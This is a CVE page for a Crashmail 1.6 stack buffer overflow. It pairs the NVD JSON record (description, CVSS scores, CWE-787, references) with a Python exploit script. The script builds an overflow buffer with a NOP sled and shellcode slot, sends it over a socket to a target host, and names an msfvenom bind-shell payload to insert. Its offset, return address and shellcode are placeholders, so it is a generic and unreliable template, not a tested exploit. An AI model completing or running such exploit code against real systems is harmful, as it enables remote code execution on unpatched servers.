CVE-2018-25223

import socket import struct # Target settings TARGET_HOST = '192.168.1.100' TARGET_PORT = 25 # Default SMTP or Crashmail service port, adjust accordingly # Payload generation # 1. Offset to overwrite EIP (Hypothetical value, needs fuzzing) OFFSET = 260 # 2. Return Address (ROP gadget or JMP ESP) # Replace with a valid address from the Crashmail executable or a loaded DLL RET_ADDR = struct.pack('<I', 0xdeadbeef) # 3. NOP Sled NOP_SLED = b'\x90' * 32 # 4. Shellcode (Example: Calc.exe or Bind Shell) # msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f python SHELLCODE = b'\xcc\xcc\xcc\xcc' buffer = b'A' * OFFSET + RET_ADDR + NOP_SLED + SHELLCODE try: print(f"[+] Connecting to {TARGET_HOST}:{TARGET_PORT}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_HOST, TARGET_PORT)) # Sending the malicious payload # Depending on the protocol, you may need to prepend specific headers print("[+] Sending malicious payload...") s.send(buffer) print("[+] Payload sent. Check for shell or crash.") s.close() except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2018-25223", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:03.170", "lastModified": "2026-04-02T19:10:16.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crashmail 1.6 contains a stack-based buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending malicious input to the application. Attackers can craft payloads with ROP chains to achieve code execution in the application context, with failed attempts potentially causing denial of service."}, {"lang": "es", "value": "Crashmail 1.6 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes remotos ejecutar código arbitrario enviando entrada maliciosa a la aplicación. Los atacantes pueden crear cargas útiles con cadenas ROP para lograr la ejecución de código en el contexto de la aplicación, con intentos fallidos que pueden causar denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ftnapps:crashmail_ii:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.6", "matchCriteriaId": "21E03FA6-0064-4DB9-AA45-D02AD7734D00"}]}]}], "references": [{"url": "http://exploitpack.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://ftnapps.sourceforge.net/crashmail.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/44331", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/crashmail-stack-based-buffer-overflow-remote-code-execution", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}